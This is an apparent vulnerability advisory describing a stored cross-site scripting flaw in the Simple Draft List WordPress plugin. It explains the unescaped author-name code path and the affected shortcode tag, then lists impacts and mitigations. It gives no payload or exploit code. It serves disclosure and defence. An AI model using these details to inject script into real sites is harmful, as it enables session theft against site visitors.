CVE-2026-4006 identifies a stored cross-site scripting (XSS) vulnerability in the Simple Draft List plugin for WordPress, affecting all versions up to and including 2.6.2. The vulnerability stems from insufficient input sanitization and output escaping of the 'display_name' post meta field, which is a custom field rather than a native WP_Post property. When the 'user_url' meta field is empty, the plugin assigns the 'display_name' value directly to the '$author_link' variable without applying escaping functions such as esc_html(), unlike other code paths where escaping is properly applied. This unescaped value is then inserted into the shortcode output via str_replace(), specifically when rendering the '[drafts]' shortcode with the '{{author+link}}' template tag. Because the 'display_name' field can be controlled by authenticated users with Contributor-level permissions or higher, they can inject arbitrary JavaScript code that will be stored and executed in the context of any user viewing the affected page. This stored XSS can lead to session hijacking, privilege escalation, or other malicious activities. The vulnerability requires no user interaction beyond page viewing and has a CVSS 3.1 base score of 6.4, indicating medium severity. No patches or official fixes are currently linked, and no known exploits have been reported in the wild. The issue was reserved on March 11, 2026, and published on March 19, 2026, by Wordfence.

The primary impact of CVE-2026-4006 is the potential for stored cross-site scripting attacks within WordPress sites using the vulnerable Simple Draft List plugin. Attackers with Contributor-level access or higher can inject malicious scripts that execute in the browsers of any users viewing affected pages. This can lead to session hijacking, theft of authentication cookies, defacement of website content, unauthorized actions performed on behalf of users, and potential pivoting to further attacks within the site or network. Since the vulnerability affects a WordPress plugin, which is widely used globally, many websites could be exposed, especially those that allow contributors to add or edit content. The scope includes all users who visit pages containing the vulnerable shortcode, increasing the risk to site administrators and visitors alike. Although exploitation requires authenticated access, many WordPress sites permit contributor roles, making this a realistic threat. The vulnerability does not affect availability but impacts confidentiality and integrity of user sessions and site content. The absence of known exploits in the wild reduces immediate risk but does not eliminate it, especially as proof-of-concept code may emerge.

To mitigate CVE-2026-4006, site administrators should first check for updates or patches from the plugin vendor and apply them promptly once available. In the absence of an official patch, administrators can implement the following specific mitigations: 1) Restrict Contributor-level permissions to trusted users only, minimizing the risk of malicious input. 2) Manually sanitize and escape the 'display_name' custom field values before saving or output, using WordPress functions like esc_html() or wp_kses() to strip or encode potentially dangerous content. 3) Modify the plugin code to ensure that the '$author_link' variable is always escaped before output, mirroring the safe code paths used elsewhere in the plugin. 4) Employ a Web Application Firewall (WAF) with rules to detect and block common XSS payloads targeting the affected shortcode. 5) Monitor logs and user-generated content for suspicious scripts or injection attempts. 6) Educate content contributors about safe input practices and the risks of injecting HTML or scripts. 7) Consider disabling or replacing the Simple Draft List plugin with a more secure alternative if immediate patching is not feasible. These targeted actions go beyond generic advice by focusing on the specific plugin behavior and WordPress meta fields involved.